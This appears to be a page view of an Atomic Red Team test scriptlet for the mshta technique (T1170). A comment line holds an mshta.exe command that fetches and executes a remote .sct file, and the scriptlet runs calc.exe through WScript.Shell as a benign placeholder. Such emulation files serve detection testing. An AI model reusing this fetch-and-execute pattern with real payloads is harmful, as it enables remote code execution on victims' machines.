Jörgen Maas
30 lines
574 B
Plaintext
30 lines
574 B
Plaintext
<?XML version="1.0"?>
|
|
<scriptlet>
|
|
<!-- Test -->
|
|
<!-- mshta.exe javascript:a=(GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct")).Exec();close(); -->
|
|
|
|
<registration
|
|
description="Bandit"
|
|
progid="Bandit"
|
|
version="1.00"
|
|
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
|
|
>
|
|
|
|
</registration>
|
|
|
|
<public>
|
|
<method name="Exec"></method>
|
|
</public>
|
|
<script language="JScript">
|
|
<![CDATA[
|
|
|
|
function Exec()
|
|
{
|
|
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
|
}
|
|
|
|
]]>
|
|
</script>
|
|
|
|
</scriptlet>
|